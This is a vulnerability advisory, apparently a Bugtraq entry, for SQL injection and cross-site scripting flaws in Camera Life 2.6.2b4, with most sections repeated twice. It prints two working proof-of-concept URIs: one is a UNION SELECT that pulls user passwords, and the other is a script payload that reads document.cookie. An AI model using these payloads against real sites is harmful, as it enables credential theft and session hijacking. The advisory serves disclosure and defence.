Camera Life SQL Injection and Cross Site Scripting Vulnerabilities
BID:31689
Info
Camera Life SQL Injection and Cross Site Scripting Vulnerabilities
| Bugtraq ID: | 31689 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6086 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 09 2008 12:00AM |
| Updated: | May 07 2015 05:22PM |
| Credit: | BackDoor |
| Vulnerable: |
Camera Life Camera Life 2.6.2b4 |
| Not Vulnerable: | |
Discussion
Camera Life SQL Injection and Cross Site Scripting Vulnerabilities
Camera Life is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Camera Life 2.6.2b4 is affected; other versions may also be vulnerable.
Camera Life is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Camera Life 2.6.2b4 is affected; other versions may also be vulnerable.
Exploit / POC
Camera Life SQL Injection and Cross Site Scripting Vulnerabilities
An attacker can exploit these issues via a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/scriptpath/album.php?id=-1+union+select+0,password,username,3,4,5+from+users
http://www.example.com/scriptpath/topic.php?name="><script>alert(document.cookie)</script>
An attacker can exploit these issues via a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/scriptpath/album.php?id=-1+union+select+0,password,username,3,4,5+from+users
http://www.example.com/scriptpath/topic.php?name="><script>alert(document.cookie)</script>
Solution / Fix
Camera Life SQL Injection and Cross Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Camera Life SQL Injection and Cross Site Scripting Vulnerabilities
References:
References:
- Camera Life Homepage (Camera Life)